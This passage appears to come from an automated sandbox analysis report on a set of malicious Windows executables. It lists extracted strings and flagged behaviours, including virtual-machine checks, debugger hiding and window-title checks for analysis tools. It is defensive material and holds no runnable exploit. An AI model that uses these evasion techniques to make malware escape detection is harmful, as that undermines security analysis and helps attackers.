                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Microsoft Hyper-V Server
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: QEMU_HARDU
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: svchost.exe, 00000008.00000003.1378683113.000002127EC44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Standard without Hyper-V Full
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Enterprise without Hyper-V Core
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                        Source: u69w.1.exe, 00000023.00000002.1911027770.0000000000A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                        Source: H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`J
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.000000000412D000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.000000000412D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`:
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: svchost.exe, 00000006.00000002.1735098946.000001D257602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Standard without Hyper-V Core
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Aapi.dllHyper-V RAW`Q$
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSystem information queried: ModuleInformation
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeProcess information queried: ProcessInformation

                        Anti Debugging

                        barindex
                        Hides threads from debuggers
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeThread information set: HideFromDebugger
                        Tries to detect sandboxes and other dynamic analysis tools (window names)
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugPort
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugPort
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041919A LdrInitializeThunk,4_2_0041919A
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00409A73
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004139E7 mov eax, dword ptr fs:[00000030h]4_2_004139E7
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040CC5B3 push dword ptr fs:[00000030h]4_2_040CC5B3
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_05BD0D90 mov eax, dword ptr fs:[00000030h]4_2_05BD0D90
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_05BD092B mov eax, dword ptr fs:[00000030h]4_2_05BD092B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_004139E7 mov eax, dword ptr fs:[00000030h]11_2_004139E7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0411C5B3 push dword ptr fs:[00000030h]11_2_0411C5B3
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB0D90 mov eax, dword ptr fs:[00000030h]11_2_05BB0D90
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BC3C4E mov eax, dword ptr fs:[00000030h]11_2_05BC3C4E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB092B mov eax, dword ptr fs:[00000030h]11_2_05BB092B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_004139E7 mov eax, dword ptr fs:[00000030h]19_2_004139E7
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0418C5B3 push dword ptr fs:[00000030h]19_2_0418C5B3
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE0D90 mov eax, dword ptr fs:[00000030h]19_2_05CE0D90
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CF3C4E mov eax, dword ptr fs:[00000030h]19_2_05CF3C4E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE092B mov eax, dword ptr fs:[00000030h]19_2_05CE092B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_004139E7 mov eax, dword ptr fs:[00000030h]21_2_004139E7
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041D3C4E mov eax, dword ptr fs:[00000030h]21_2_041D3C4E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C0D90 mov eax, dword ptr fs:[00000030h]21_2_041C0D90
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C092B mov eax, dword ptr fs:[00000030h]21_2_041C092B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0434C5B3 push dword ptr fs:[00000030h]21_2_0434C5B3
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 24_2_0040F124 mov eax, dword ptr fs:[00000030h]24_2_0040F124
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00420C1A GetProcessHeap,4_2_00420C1A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385C6E20 RtlAddVectoredExceptionHandler,0_2_00007FF6385C6E20
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63862B514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF63862B514
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00409A73
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409C06 SetUnhandledExceptionFilter,4_2_00409C06
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00409EBE
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041073B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00409A73
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409C06 SetUnhandledExceptionFilter,11_2_00409C06
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00409EBE
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0041073B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_05BB9CDA
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9E6D SetUnhandledExceptionFilter,11_2_05BB9E6D
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BC09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_05BC09A2
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_05BBA125
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00409A73
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409C06 SetUnhandledExceptionFilter,19_2_00409C06
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00409EBE
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0041073B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_05CE9CDA
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE9E6D SetUnhandledExceptionFilter,19_2_05CE9E6D
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CF09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_05CF09A2
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_05CEA125
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00409A73
